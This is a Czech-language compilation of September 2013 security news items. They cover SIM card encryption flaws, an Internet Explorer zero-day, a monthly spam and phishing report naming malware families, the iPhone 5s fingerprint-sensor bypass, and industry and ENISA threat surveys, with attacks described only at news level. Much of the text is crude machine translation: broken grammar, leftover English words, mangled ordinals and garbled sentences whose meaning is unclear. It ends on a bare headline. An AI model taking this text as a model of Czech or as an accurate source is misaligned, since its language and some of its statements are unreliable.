Výzkumník zoufá nad kritické SIM nedostatky jsou stanoveny před útoky se stalo 24. září 2013. Zranitenosti | Zabezpečení Dva měsíce, které uplynuly od badatel Karsten Nohl oznámil, že našel a podařilo se pákový kritické chyby v šifrovací technologie používané některými SIM kartami, ale telekomunikační společnosti jsou ještě reagovat a opravit je.
Ano, když vyšel s informacemi a sdílet ji s telekomunikací, oni říkají, že by se na to. Ale jak čas ubíhal, Nohl stal se přesvědčený, že se odklad jednání, nebo dokonce přímo v plánu nic nedělám určit na alespoň jeden z nich, protože jim to umožňuje bezobslužně nasadit svůj vlastní software aktualizace na thusly backdoored telefonů. Nohl objev mu umožnila objevit šifrování DES klíče jednotlivých ohrožených SIM karty jednoduše zasláním speciálně vytvořenou SMS na cílové zařízení, pak zlomit a používat znalosti na dálku překonfigurovat na SIM tak, že přijímá další pokyny jako pro instalaci špionážní aplikace bez uživatel si toho byli vědomi. Byl dokonce schopen naklonovat kartu. "Mysleli jsme, že náš příběh byl jedním z bílo-hat hackerů prevenci trestné činnosti," sdílel s registrem, ale řekl, že proto, že žádný přímý trestný čin byl objeven v současné době děje v důsledku těchto vad, žádné šetření byla zahájena o věci. Frustrovaný zjevné ignorování odvětvím telekomunikací a SIM výrobců, se rozhodl přijít s další podrobnosti o zranitelnosti. Tyto údaje by mohly pravděpodobně pomoci hackerům replikovat své vlastní útoky, ale může také vynutit ručně společnosti "dělat něco o tom. Mezi společnosti, které se kontaktovaných byl Gemalto, která je největším světovým SIM karta výrobce, a on dostal řekl, že nedostatky byly nedůležité. Společnosti mají pravdu v jedné věci. V současné době, útok je poměrně složitá a útočník musí mít dobré znalosti o rozvržení paměti na SIM kartě a kryptografie, a jedná se pravděpodobně o nepatrný počet útočníků, kteří by byli schopni vytáhnout ho. ale jako vadné SIM karet stále hostit bankovní aplikace, čas eventfully ve chvíli, kdy je možnost krádeže obrovské sumy peněz budou s větší pravděpodobností, a útočníci thusly více motivováni. Bohužel, on si myslí, že společnosti budou naslouchat a uskutečnit změny, pouze tehdy, když vážné útok zneužívat případných chyb se stane.
Zdarma průvodce iOS 7 24. září 2013. Příručky iOS 7 Apple je nejnovější aktualizace operačního systému, který pohání mobilní zařízení, včetně iPhone, iPad a iPod Touch.
Nová verze iOS představuje pozoruhodné zlepšení oproti posledním z hlediska estetiky a funkce, a tento průvodce by vám až do rychlosti změn a doplnění toho, co Apple volá nejvýkonnější mobilní OS. Získejte zdarma průvodce zde .
IE 0-day attack zprávy tlačit ISC zvýšit oficiální úrovně ohrožení 24. září 2013.Zranitelnosti | Hacking Během víkendu, FireEye vědci podařilo vrhnout světlo na in-the-Wild útoků Využitím nejnovější objevil Internet Explorer zero-day zranitelnosti (CVE-2013-3893), a byly sledovány zpět do čínské hackerské skupiny, které postihly . Bit9 letos Podle jejich výzkumu, kampaň - daboval DeputyDog - byl cílení japonské organizace od August 19 srpnu 2013, a útočníci byli pomocí C & C infrastrukturu, která se vztahuje k infrastruktury používané v útoku na Bit9 :
Některé vzorků malwaru, které objevili a analyzovány byly sestaveny 19. srpna. Jako připomínka: Microsoft vydala opravit chyby zabezpečení dne 17. září, a potvrdila, že se týká všech podporovaných verzí aplikace Internet Explorer. Mají stále není potvrzena, kdy bude tato aktualizace zabezpečení, kterým se stanoví vadu být propuštěn. Další je Patch Tuesday je naplánováno na říjen 8, takže zbývá doufat, že Microsoft se bude zabývat vydávání out-of-band patch. Mezitím Internet Sans "Storm Center reagoval tím, že zvýší své oficiální úrovně ohrožení na "žlutý", po "větší důkaz o zneužití ve volné přírodě o Microsoft Security Advisory 2887505". "Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle," komentoval ISC psovod Russ McRee a dodal, že Rapid 7 je také pravděpodobné, že uvolnění Metasploit exploitu pro chybu brzy. "Nejjednodušší způsob, jak se vyhnout tomuto riziku je použít jiný prohlížeč než Internet Explorer," upozornil Ross Barrett, senior manažer bezpečnostní inženýrství na Rapid7. "Uživatelé, kteří musí používat Internet Explorer by měla nainstalovat všechny dostupné záplaty Internet Explorer, a používat pouze nejnovější dostupné verze. Ani jedna z těch věcí, bude přímo pomoci s tímto konkrétním problému, ale jsou dobré postupy a předpoklady pro následujících akcí, které mají být v veškeré účinné. " "Chcete-li snížit riziko zneužití tohoto problému, nainstalujte Emet 4.0, nakonfigurujte ji nutit ASLR a umožňují řadu haldy postřiku a ROP ochran. Navíc, tam je" fixit "k dispozici od společnosti Microsoft, který se bude snažit změnit systém, aby se zabránilo zneužívání, "řekl uzavřena .
Cisco rozšiřuje bezpečnosti a zabezpečení řešení 24. září 2013. Bezpečnost Cisco oznámila vylepšení svého portfolia bezpečnosti a bezpečnostních řešení s architekturou video pozorování a nový internet věcí (Internet věcí) umožnila řešení, které usnadňují správu milionů připojených kamer a zařízení.
Internet věcí je další technologie přechodu, kde zařízení nám umožní vnímat a ovládat fyzický svět tím, že předměty, chytřejší a jejich připojení pomocí inteligentní sítě. Video Surveillance Manažer 7 (VSM7) poskytuje nové funkce, které umožňují centrální nebo více operací řízení Inteligentní video monitorovací a otevřenou platformu pro analytiky a metadat. Organizace hledají nasazení více kamer ve více oblastech, které chrání občany, zákazníky a zaměstnance. Podle nové zprávy zveřejněné v Markets a trhy katalogu je kamerové systémy a služeb trhem uvedeným dosáhnout 36280000000 dolarů do roku 2018. Organizace potřebují bezpečné a flexibilní kamerový architektury pro správu rostoucího počtu kamer, které nasazují ve vysoce distribuovány tvrdé a průmyslové prostředí. Cisco VSM 7 přizpůsobuje měnícím se potřebám podniků a poskytuje snadný způsob, jak spravovat videa, zdroje, řešení problémů a business intelligence. Inteligentní video monitorovací systémy jsou stále více využívány jako cenné obchodní nástroje ke zmírnění celopodnikové a globální rizika a zlepšení provozní procesy. Tím, že poskytuje platformu, kde mohou podniky využívat své vlastní provozní informace ke zlepšení produktivity prostřednictvím analýzy a velkých objemů dat, mohou organizace identifikovat a reagovat rychle řídit provozní efektivity v různých průmyslových odvětvích, jako je zdravotní péče, výroba, doprava, ropy a zemního plynu, a veřejné bezpečnosti . VSM7 poskytuje vysoce zabezpečené a škálovatelné architektury video dohled s následujícími možnostmi:
Federator pomáhá organizacím centrálně spravovat miliony IP kamer z jednoho uživatelského rozhraní přes globálně distribuované nasazení kamerového dohledu. Dynamické proxy efektivně využívá šířku pásma sítě přináší kvalitní video pro více uživatelů přistupujících stejné video streamy z libovolného místa. Rozšířené Medianet možnosti zjednodušení správy, provozu a odstraňování problémů s end-to-end vizualizace obrazových toků a on-demand Mediatrace z kamery do video klientovi. Nulová ztráta dat zajišťuje, že video může být zachována. V mobilním prostředí, jako je doprava, kdy je připojení k síti často přeruší, může kamery ukládat video, místně, dokud připojení k síti bylo obnoveno, automaticky přenášet video na server médií.
V srpnu 2013 se stal spam mnohem nebezpečnější: počet podvodných a nebezpečných e-mailů výrazně zvýšil proti výraznému poklesu celkové procento spamu.
V běhu do nového školního roku, "Zpátky do školy" se stal jedním z nejoblíbenějších témat pro spammery - v srpnu jsme zaznamenali reklamy pro všechny druhy školních pomůcek.Tam byl také hodně spam týkající se sportu a zdravého životního stylu.Auto obchodníci také uchýlila k službám spammery "při prodeji auta, spolu se souvisejícími službami a příslušenství, také prominentní v hromadné korespondenci.
Pro mnoho lidí je automobil není jen dopravní prostředek - je to skoro způsob života, který vyžaduje značný čas a peníze.Spammeři jsou dychtiví využít zájem lidí v autech: V srpnu jsme zaznamenali řadu propagačních hromadnou korespondenci, která kromě standardních nabídek prodeje a oprav, zahrnuty některé velmi originální auto-související nabídky.Například autoři jedné hromadnou korespondenci pozval příjemce se připojit k mistrovskou třídu na výrobu dortů ve tvaru auta.
Nicméně, angličtině spam nejčastěji obsažen inzeráty levných služeb autopůjčoven a prodej vedoucích automobilových značek.
Na první pondělí v září ve Spojených státech slaví Svátek práce.Většina Američanů považuje za symbolický konec léta a tradiční čas na dárky a slevy.Samozřejmě, že spammeři se rychle využít: celý srpen, aktivně se šíří e-maily reklamní slevy na auta a léky.Chcete-li přilákat větší pozornost a přesvědčit uživatele, neodkládat nákup, spammeři rozeslal zpráv, které obsahují speciální kód, slibuje další slevu.
Jak by se dalo očekávat, spammerů asi motto světu srpnového bylo "Zpátky do školy".Začátek nového školního roku se stal tématem měsíce jako všechny druhy školních pomůcek se propagovala online.
Nicméně, v některých případech, inzerované zboží nemá nic do činění s vzdělávacího procesu - spammeři prostě použít toto téma k upoutání pozornosti na co to bylo, že se reklamy.Například jsme zaznamenali hromadnou korespondenci s nabídkou produktů péče o pleť.Možná, že chtějí zajistit yummiest mumií na školní běhu, spammeři nabídl rychle pracující kosmetiku který prohlašoval, že vliv zázračné změny před první zazvonil zvonek.Tyto e-maily obsahovaly dlouhý odkaz, který přesměruje uživatele na stránky, kde byli vyzváni, abyste zvolili oblast dodávky.Na druhé straně, výběr regionu aktivován stránku s kontaktní údaje prodejce.Ve stejné době, domény použité v přesměrování nepůsobí na více než jeden týden po zahájení hromadnou korespondenci.
"Vy jste ještě hnědé obědy bagging škola?"přečíst hlavičku jiného korespondenci.Toto zasílání využívány školní téma propagovat speciální balíčky, které umožní udržet potraviny čerstvé.Autoři zprávy slíbil, že balíček může udržet potraviny chladné a čerstvé po dobu až 10 hodin.Odkazy v e-mailech se skládal z jednotlivých oblastí vytvořených v předchozím měsíci.
V srpnu jsme pokračovali k registraci hromadnou korespondenci reklama on-line vzdělávání.Ale namísto pošty z předchozích měsíců, které nabízí magisterské a doktorské programy, run-až do nového školního roku došlo nabídky pro neúspěšných žáků k dokončení středoškolských studií online.
Autoři nevyžádané e-maily zdůraznil flexibilní plány a možnost pracovat z domova jako klíčové výhody on-line vzdělávání.Další informace byly příjemci přesměrován na cizí webové stránky, kde kromě studijních programů, byly předloženy jiné non-vzdělávací služby.
Významný podíl spamu srpnového obsahoval zdraví související zprávy.Váha-ztráta pilulky i nadále jedním z nejpopulárnějších témat.Minulý měsíc jsme narazili na hromadnou korespondenci v souvislosti s těmito jak na RuNet a anglické jazykové internetu.
Angličtina-jazyk hromadné e-maily reklama na hubnutí prášky obvykle uložen odkaz založenou na nově zřízené doméně.Tento odkaz se pohybovala od e-mailu na e-mail.Kliknutím na odkaz je uživatel přesměrován byl na místě s podrobnými informacemi o prášky, nákup podmínek atd. Text přišel s propagačním videu, které prokázaly zázračné vlastnosti prášků a nabízí souhlasy od lidí, kteří se údajně snažili je.
Ruskojazyčných zprávy obvykle obsahuje krátký odkaz přesměrování uživatele na reklamní stránky.Často za předpokladu kontaktní údaje pro objednání zboží.
V srpnu 2013 Top 3 zdroje celosvětového spamu vypadal takto: Čína zůstala v 1prvnímmístě s 21% všech distribuovaných spamu, pokles o 2,4 procentního bodu oproti předchozímu měsíci, USA přišel 2nd, které rozdělí 19% spamu světa, což představuje nárůst o 1 procentní bod oproti červenci, byla Jižní Korea 3rd, v průměru 15,4% (0,4 procentních bodů).Celkem tyto tři země představovaly 55% světového spamu.
Stejně jako v červenci obsadila Tchaj-wan 4thmísto, přispívá 5,5% k toku světového spamu, a to až o 0,1 procentního bodu.Ruský podíl zvýšil o 2 procentní body, což představuje 4,3% a pohybuje se to od 10téhona 5thcelkově.
Japonsko (1,8%), také posunul o pět míst po nárůst o 0,9 procentního bodu ji zvedl na 11th.Pokud tomu tak růstový trend pokračuje iv nadcházejících měsících, možná Japonsko proniknout do top 10 nejvíce aktivních distributorů globálního spamu.
Ostatní Top 10 členů udržuje své pozice v ratingu se zanedbatelnými výkyvy v jejich příspěvků.
V srpnu, Jižní Korea zůstala hlavním zdrojem nevyžádané pošty odeslané na evropské uživatelů (60%): její podíl vzrostl o 2,6 procentního bodu.To bylo následováno Tchaj-wan (4%) a USA (3,9%).
Rusko (2,8%) obsadil 4.ročníkpozici v hodnocení srpnového: její podíl vzrostl o 1,8 procentního bodu - dost lézt 10 míst.Vietnam příspěvek (2,7%) se snížil o 0,7 procentního bodu ve srovnání s předchozím měsícem a významu to spadlo na pětročníkumísto v hodnocení.
Top 10 také v Indonésii (1,7%), který byl v 8.ročníkupoloze v srpnu, zatímco v Rumunsku (1,4%) opustil hodnocení upustila od 6.ročníkudo 11.ročníkumístě.Německo (1,5%) byla 10thtéměř beze změny oproti předchozímu měsíci.
V srpnu se spam toky z asijského regionu se stala o něco více aktivní, když viděl, Thajsko (0,9%), Singapur (0,6%) a Japonsko (0,6%), zadejte hodnocení z 20 největších zdrojů spamu zaslaných evropské uživatele.
V srpnu, Asie (55,2%) zůstala vedoucí regionální spam zdroj.Stejně jako v předchozím měsíci, Top 3 také Severní Amerika (21%) a východní Evropy (14%): nedošlo k vážné změně v množství spamu pocházejícího z těchto zemí, s výjimkou Severní Ameriky, kde se podíl zvýšil o téměř 1 procentního bodu.Západní Evropa (4,6%) a Latinská Amerika (3%) přišlo 4tha 5týresp.
V srpnu byly škodlivé přílohy zjištěny v 5,6% e-mailů, což představuje nárůst o 3,4 procentního bodu od července.
Trojan-Spy.html.Fraud.gen zůstaly nejrozšířenějším škodlivý program (8,1%).Zdá se, ve formě HTML stránek, které napodobují registračních formulářů známých bank nebo e-mzdové systémy a jsou používány phisherů ukrást přihlašovací údaje pro on-line bankovních systémů.
Naše srpna hodnocení zahrnoval čtyři Trojan-Ransom.Win32.Blocker úpravy.Tři z nich - Trojan-Ransom.Win32.Blocker.byxx (3%), Trojan-Ransom.Win32.Blocker.bzbh (1,8%) a Trojan-Ransom.Win32.Blocker.bysg (1,4%) - obsazený 2nd, 5tha 7thpozice, resp.Tyto škodlivé programy jsou určeny pro vydírání a vydírat peníze od uživatelů.Blokují práci operačního systému a zobrazí banner, který dává pokyny, jak odblokovat počítač.Například, uživatel je řečeno, poslat textovou zprávu s konkrétním textem na pojistné sazby čísla.
E-Worm.Win32.Bagle.gt (2,3%) skončilo po měsíci, ve 3.třetímmístě.Tento mailový červ je distribuován ve formě přílohy e-mailu, který vysílá pouze na adresy v oběti seznamu kontaktů.To může také stáhnout další škodlivé programy do počítače uživatele.
Čtvrtý palce byla obsazena Trojan-Spy.Win32.Zbot.nyis (2,2%), změna jedné z nejpopulárnějších Trojan-Spies Zbot (Zeus), navržen tak, aby krást důvěrné informace, včetně údaje o kreditní kartě.
Worm.Win32.Mydoom.m (1,4%) zůstal 8thv ratingu srpnové.Kromě vlastní zbraní odešle skryté požadavků na vyhledávání vyhledávačů a tím zvýšit návštěvnost a kvalifikací stránek, stažených ze serverů podvodníky.
Ještě další modifikace Mydoom rodiny, E-Worm.Win32.Mydoom.l (1,4%), dokončil Top 10 nejrozšířenější škodlivé programy.Tento červ je distribuována přes internet ve formě e-mailu.Jeho hlavní funkcí je sklidit e-mailové adresy z infikovaných počítačů, takže mohou být použity pro další hromadnou korespondenci.Má také backdoor schopnosti.
V srpnu, Německo (12,3%) trumfl hodnocení zemí, nejčastěji na něž se zaměřuje nebezpečných e-mailů tlačí předchozí měsíc vůdce, USA (10,1%), do 2druhémmístě.Spojené království přišlo 3rds 8,7% podílem na detekci antivirových.
Indie (6,08%) se snížil z 3rddo 5téhopolohy.Rusko (3,48%) získala 1 procentní bod a skončil na 9.ročníkukoná v srpnu.Austrálie podíl klesal a průměru 4%.Kanada dokončil Top 10 s 2,2% zjištěných antivirových.
Podíl zjištěných antivirových pro ostatní země neměl výrazně lišit.
Prázdnin může být postupně slábne, ale podvodníci udržovali nepřetržité bombardování falešných zpráv oznamujících neexistující letecké společnosti a hotelové rezervace s spammery použití některé z největších jmen v těchto odvětvích.Dobře známé společnosti, jako je booking.com a Delta Air Lines jsou neustále napodobovány spammery av srpnu jsme zaznamenali více podvodné maily s falešnými oznámeními z těchto společností.Adresy odesílatelů "často vypadají velmi přesvědčivě, což může mít za následek příjemců otevřením souboru tohoto typu e-mailu.
E-mailu zaslaného údajně jménem booking.com informoval uživatele, že jeho hotelová rezervace byla potvrzena a za předpokladu, podrobnosti objednávky včetně data check-in a check-out, jakož i celkové náklady na hotelový pokoj.Tento e-mail byl podvod navržen ve stylu oficiálních webových stránkách, které ji odlišovalo od obdobnou imitující oznámení od společnosti Delta Air Lines informuje příjemce, že jeho kreditní karta platba byla přijata, a také podrobnosti o čísla, data a náklady na let.Příjemci byli vyzváni ke kliknutí na odkaz vytisknout jízdenku, ale pokud by tak učinili, byl nebezpečný soubor stáhnout do počítače.Zpráva, údajně odeslána z booking.com obsahoval škodlivý soubor v příloze.V obou případech se jednalo o škodlivých souborů z Trojan-PSW.Win32.Tepfer rodina používá ukrást uživatelská jména a hesla.
V srpnu, po dlouhém období klidu podvodníci začali vysílat škodlivé oznámení znovu od Royal Caribbean International výletních lodí.Podvodný e-mail informoval uživatele, že e-dokumenty pro údajně objednané plavby byly připraveny.Tyto dokumenty obsahují "Důležité informace" Cestující by měli vědět před nástupem do lodi a musí být uchovávány a na palubu spolu s cestujícího pasu a dokumentů.Ve skutečnosti, e-mail obsahoval škodlivý Backdoor.Win32.Androm.qt soubor Backdoor.Win32.Androm modifikace používají tajně ovládat počítač uživatele a přidejte jej do botnetu.
Falešné oznámení často využívají jména populárních mezinárodních doručovacích služeb, jako je FedEx, UPS a DHL.Říkají, že příjemce kurýr nepodařilo doručit zásilku z důvodu jejich nesprávného dodací adresy.Chcete-li získat parcelu, měl by příjemce vytisknout přiložený dokument a zavolejte společnosti kancelář nebo potvrzení zadaných údajů, včetně adresy dodání.Škodlivé soubory lze také schovat do falešných dokumentů, údajně obsahující podrobné informace o pozemku, který není ve skutečnosti neexistuje.Spammeři se snaží, aby jejich falešné oznámení vypadat legitimní a obvykle používají nejen zdánlivě skutečné adresy odesílatele, ale poskytují neexistující informace o objednávkách, originální kontaktní údaje z oficiálních internetových stránkách a kopii dopisu soukromí oznámení.
Přiložené archivy obvykle obsahují škodlivé soubory z různých rodin.Například archiv Vyúčtování copy.zip připojen k falešné oznámení FedEx obsahoval spustitelný soubor Vyúčtování copy.exe s Trojan z Zeus / Zbot rodiny.Tento škodlivý program se používá k ukrást osobní informace uživatelů a hesla pro jejich placení a bankovních účtů.Falešné oznámení zasláno jménem UPS obsažených Trojan-PSW.Win32.Tepfer.pnfu, určený k ukradení uživatelská jména a hesla.Ještě další škodlivý program patří do Backdoor.Win32.Androm rodiny byl objeven v hromadnou korespondenci údajně šíří jménem DHL.Podvodníci používají ji získat plný přístup k počítači oběti.
Srpnu došlo k poklesu v obchodní činnosti, aby spammeři dostal méně zakázek pro reklamu a nadšeně přešel na podvodných zpráv.V důsledku toho se podíl phishingových e-mailů ve světové spam provozu zvýšil desetinásobně ve srovnání s červencem, dosáhl 0,013%.
Distribuce Top 100 organizací, na něž phisherů, podle kategorie *
Toto hodnocení je založeno na anti-phishing společnosti Kaspersky Lab COMPONENT detekcí, které jsou aktivovány pokaždé, když se uživatel pokusí kliknout na odkaz phishing, bez ohledu na to, zda je odkaz v nevyžádaných e-mailů nebo na webové stránce.
Nejatraktivnější cíle pro útoky typu phishing se výrazně neliší v srpnu.Sociální síť lokalit pokračoval na začátek seznamu, se do této kategorie je podíl nemění od července - 29,6%.
E-mail a instant messaging služby (17,2%) zůstalo druhé: podíl útoků na této kategorie se snížil o 0,4 procentního bodu.Mezitím údaj pro vyhledávače (16,1%) mírně vzrostla, který viděl, že zůstanou v kategorii 3. místo.
Finanční a E-pay služby (13,8%), IT dodavatelé (8,4%), Telefon a Internet Service Providers (7,8%), internetové obchody a e-aukce (5,4%) a on-line hry (0,7%) obsazené pozice 4-8 .
V srpnu, Apple se ocitl mezi hlavními phishing cílů.Často jsme narazili na e-maily, který údajně přišel z oficiální adresa společnosti, ale ve skutečnosti byly phishingových zpráv, jejichž účelem je oklamat uživatele a ukrást jejich přihlašovací jména a hesla.Například, některé e-maily, dal uživateli 48 hodin potvrďte podrobnosti o iTunes účtu.Pro odblokování účtu, příjemce musel kliknout na odkaz v e-mailu, a postupujte podle pokynů na stránce.Spammeři se snažil uklidnit uživatele do falešného pocitu bezpečí, poukazovat na to, že zpráva byla vytvořena automaticky.Je však třeba i žádost potvrdit informace o účtu třetích stran a absence osobní adresu upozornit uživatele na nebezpečí podvodu.
V srpnu se podíl světového spamu klesl na 67%, což by mohly být způsobené meziročním poklesem v obchodní činnosti v letním období a pokles ve výši reklamního spamu.Nicméně, jsme zaznamenali hodně hromadnou korespondenci věnovaných pronájem nebo prodej vozů a medicíny a zdravého životního stylu.Navíc spammeři využili témata nového školního roku a práce amerického svátek inzerovat prodej různých druhů zboží.
Během léta, spam stává trestnými činy a počet falešných zpráv, které obsahují škodlivé soubory se zvyšuje.V srpnu, pozoruje Trojan navržen tak, aby krást finanční informace byly rozšířené škodlivého spamu provozu.Nicméně, Trojan-Ransom.Win32.Blocker rodina červů byla také velmi populární s podvodníky a několik změn lze nalézt mezi nejčastěji detekovaných škodlivých programů.
Během prázdnin spammeři nadále aktivně šíří falešné zprávy jménem společností zapojených do rezervace hotelů a letenek.Kurýrní firmy také přitahuje pozornost podvodníci ", přičemž jejich jména se používá jak pro phishing a šíření malware.
Podvodníci používají populární Apple produkty a služby ukrást uživatelská jména a hesla.Na RuNet, podvodníci používají spam vytvořit a podporovat online služby imitující oficiální služby veřejným organizacím, aby se vydírat osobní údaje a peníze od uživatelů.
Srpnové hodnocení z nejatraktivnějších cílů v oblasti phishingových útoků neměl výrazně lišit.Jak se dalo očekávat, sociálních sítí a e-mailu a instant messaging služby udržovat své vedoucí pozice.V posledním měsíci letních činnost školní děti a studenty na sociálních sítí a e-mailových služeb, zůstala vysoká, a zajistit, aby phishingu zůstal zájem v tomto sektoru.Nicméně, v září, kdy obchodní činnost začne obnovovat tento zájem přejde od sociálních sítí zpět do finančních institucí, a počet útoků na bankovní sektor zvýší.Současně se podíl podvodných a škodlivý korespondence s největší pravděpodobností pokles.
Prolomeno. První hackeři dokázali překonat snímač otisků nového iPhonu
23.9.2013 Hacking | Zranitelnosti | Biometrika | Mobil
Stačil týden a bezpečnostní prvek snímače otisků padl. Skupina německých hackerů tvrdí, že se jí podařilo zabezpečení prolomit jen dva dny poté, co Apple začal modely distribuovat na pulty obchodů. Právě snímač otisků má přitom chránit přístroje před zločinci a slídily.
Snímač otisku prstu zabudovaný v tlačítku je jedním z hlavních lákadel nového iPhonu 5s Bezpečnostní prvek telefonu se údajně podařilo prolomit německé skupině známé jako Chaos Computing Club, tedy CCC. Skupina to uvedla na svých stránkách. Zástupci Applu se ke zprávě nevyjádřili.
CCC zveřejnil video, které ukazuje, jak se jim podařilo dostat do iPhonu 5S pomocí falešného otisku prstu. Skupina získala otisk tak, že vyfotografovala a vytiskla na tenkou folii. Ke svému článku přidala navíc návod, jak otisk prstu získat.
„Otisk prstu by se neměl používat pro zabezpečení čehokoliv. Necháváte ho všude a je velmi jednoduché si vyrobit falešný otisk prstu,“ uvedl v článku hacker, který si říká Starbug. Podle CCC podobný postup lze použít k prolomení většiny snímačů otisků prstů na trhu.
Dotykový senzor iPhonu má telefon odlišit od konkurence
Dotykový senzor na novém modelu iPhonu 5S slouží k odemknutí přístroje a nakupování v internetovém obchodě iTunes. Uživateli stačí jednoduše přiložit svůj prst na hlavní tlačítko telefonu. Recenzenti se minulý týden rozplývali nad jeho spolehlivostí a nad tím, jak se snadno používá.
Bezpečnostní odborníci, kteří minulý týden nabídli odměnu tomu, kdo jako první prolomí zabezpečení snímače prstů iPhonu, uvedli, že zkoumají informace zveřejněné na internetových stránkách CCC, ale chtějí více informací. Odměna za prolomení kódu činí více než 13 tisíc dolarů (zhruba 247 tisíc korun) v hotovosti.
Bezpečnostní rizika skrývá také iOS 7
Forbes.com ale mezitím informoval, že jistý voják na Kanárských ostrovech už odhalil slabé prvky v zabezpečení zasahujícím operační systém iOS 7, který Apple stávajícím uživatelům iPhonů a tabletů iPad zpřístupnil ve středu. Podle něj je během několika vteřin možné obejít uzamčení obrazovky a dostat se k fotografiím a dalším materiálům. Mluvčí Applu Trudy Mullerová řekla, že firma v příští aktualizaci systému provede opravy.
Firmy proti dnešním útokům využívají staré strategie
23.09.2013 Zabezpečení | Hacking Společnosti zaostávají, protože útočníci je zatím stále přechytračují díky nejnovějším technologiím, kterými jsou vybaveni.
Firmy proti dnešním útokům využívají staré strategie
Válka o informace pokračuje a boje přituhují. Zatímco ale organizace pomalu nasazují obranné techniky, které byly vyvinuty před lety proti tehdejším technologiím, protivníci využívají slabin, které mohly být objeveny třeba tento týden. Platí to v České republice stejně jako v jakékoli jiné zemi.
Poměrně alarmující informace v pátek uveřejnila konzultační společnost PricewaterhouseCoopers. Ve studii „The global state of information security survery 2014“, která vychází z dat nasbíraných od více než 9 600 společností a bezpečnostních profesionálů, primárně vybíraných v oblasti asijského Pacifiku.
Letošní analýza zjistila, že počet bezpečnostních incidentů, které byly detekovány během posledních 12 měsíců, se meziročně zvýšily o 25 procent, zatímco průměrný finanční dopad takového útoku se zvednul o 18 procent. Přitom investice do bezpečnosti jsou i nadále velké, průměrný rozpočet určený na bezpečnost se za poslední rok zvýšil o 85 procent. Většina respondentů je i nadále optimistická, co se alokace finančních prostředků na bezpečnost týče, 60 procent počítá s dalším navýšením během následujících 12 měsíců.
Bohužel, průměrné finanční ztráty způsobené vinou bezpečnostních incidentů se zvedly o 28 procent. Znepokojující je, že prudce vzrostl počet případů, ve kterých finanční ztráty přesáhly 10 milionů dolarů – více než o 50 procent od roku 2011.
V reakcích překvapivě figurovala značná část ředitelů jako hlavní překážka ve zlepšování bezpečnostních praktik společností. Většina respondentů uváděla jako primární zdroj bezpečnostních incidentů dřívější nebo současné zaměstnance, u bezpečnostních útoků zvnějšku 32 procent společností jmenuje jako původce hackerské skupiny a pouze 4 procent uvádí jako útočníky státní agentury.
PricewaterhouseCoopers doporučuje přepracování bezpečnostních strategií tak, aby byly integrovány s potřebami každé společnosti a aby jim priority přidělovalo vrcholné vedení. „80 procent respondentů tvrdí, že jejich informační bezpečnost je v souladu s obchodními prioritami firmy. To ukazuje, že management začíná chápat míru dopadu bezpečnostních incidentů. Ale musí jít ještě o krok dále a posílit chápání nutnosti bezpečnostních kroků ve všech částech jejich společností. Spolupráce, ať už interní či interní, je stává klíčovou zbraní.“
Jako každoročně se zpráva věnuje i mobilní a cloudové bezpečnosti, která opět zaostává proti ostatním segmentům. Například ze 4 procent respondentů, kteří využívají cloudové prostředky, má pouze 18 procent odpovídající směrnice pro jejich bezpečné a správné využívání.
Počítačoví zločinci se snaží nové taktiky , bezpečnost tělo varuje - a útoky by mohly mít " velký dopad "
22 září 2013 Kriminalita | Hacking
Počítačoví zločinci se spínací taktiku , přední bezpečnostní orgán varoval - a kombinace anonymizace technologií, mobilních zařízení a sociálních médií útoky by mohly vést k kybernetickými útoky s " velkým dopadem " .
Průběžná hrozeb zprávy vydané Evropskou bezpečnost sítí a informací agentury je " první chuť " z kompletní zprávy splatné do konce roku , a analyzuje 50 zpráv identifikovat nové a rostoucí hrozby.
Drive- by využije byly identifikovány jako číslo jedna nebezpečí ohrožující firem a uživatelů počítačů, ale společnost varovala, že další hrozby rostly v popularitě - jako škodlivé rozšíření prohlížeče . " Za zmínku stojí, ženárůst škodlivých rozšíření prohlížeče byla zaregistrována , jehož cílem je převzetí účtech sociálních sítí , " řekl ENISA . ESET zpráva o škodlivý rozšíření do populární Orbit Downloader naleznete zde .
"Je to posun od Botnety škodlivý URL jako přednostní prostředek k distribuci malwaru . Výhodou URL coby distribučního mechanismu spočívá v tom, že adresy URL nejsou tak snadným terčem pro takedowns činnými v trestním řízení , " píše se ve zprávě .
Zpráva rovněž poukázal na to , že zločinci jsou stále více ohrožuje infrastrukturu s cílenými útoky azvýšení využívání mobilních zařízení a sociální média krádeží identity prováděno prostřednictvím cloudových služeb .
" Je jasné, že mobilní technologie jsou stále více využívány kybernetických zločinců . Hrozby všeho druhu , které se vyskytují ve více tradičním aréně to bude mít vliv mobilních zařízení a služeb dostupných na těchto platformách. Široké rozšíření mobilních zařízení vede k zesílení zneužití založené na znalostech / Útok metod zaměřených na sociální média , " píše se ve zprávě .
Dostupnost cryptocurrencies a digitálních měn také zločinci se snadnou prostředky " perou " své zisky , uvádí zpráva - a také poukázal na rostoucí hrozbu kybernetických zločinců , které nabízejí "služby" vedle malware.
"Dostupnost škodlivého softwaru a cyber- hackerských nástrojů a služeb, spolu s digitálními měnách ( např. Bitcoiny ) a anonymních platebních služeb, otevírá nové možnosti pro kybernetickou podvodům a trestné činnosti . "
Tento týden ruští útočníci údajně nabídl kombinaci " hacknutý " PIN zařízení a služby, praní špinavých peněz jako " balíček" k zákazníkům.
ESET výzkumný pracovník David Harley řekl: "Nejvíce znepokojující aspekt je podpora služeb balíček . Bohužel , vypracování takových podpůrných sítí je něco , pro které východoevropské gangy ukázaly zvláštní vkus v uplynulých letech. Domnívám se, že uvidíme podobné balíčky spojené s bankovními trojských koní, které mají funkce pro přístup k informacím z čtečky čipových karet připojených k systému Windows strojů. "
ENISA varuje, že rostoucí využívání útoků , které kombinují různé techniky - mobilní , anonymních útoky a " počítačové služby ", jako praní špinavých peněz , by mohlo vést k vážným hrozbám .
"Existujereálná možnost velkých dopadů událostí , kdy jsou útoky kombinující různé hrozby úspěšně uvedla na trh , " píše se ve zprávě .
Výkonný ředitel agentury ENISA , profesor Udo Helmbrecht řekl: " Tento krátký , průběžná zpráva informuje bezpečnostní zúčastněné strany co nejdříve o vývoji v internetovým hrozbám , aby byli schopni přijmout protiopatření " .
Postu Počítačoví zločinci se snaží nové taktiky , bezpečnost tělo varuje - a útoky by mohly mít " velký dopad " se objevil na prvním místě Žijeme zabezpečení.
Nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank
22 září 2013 Viry | Hacking
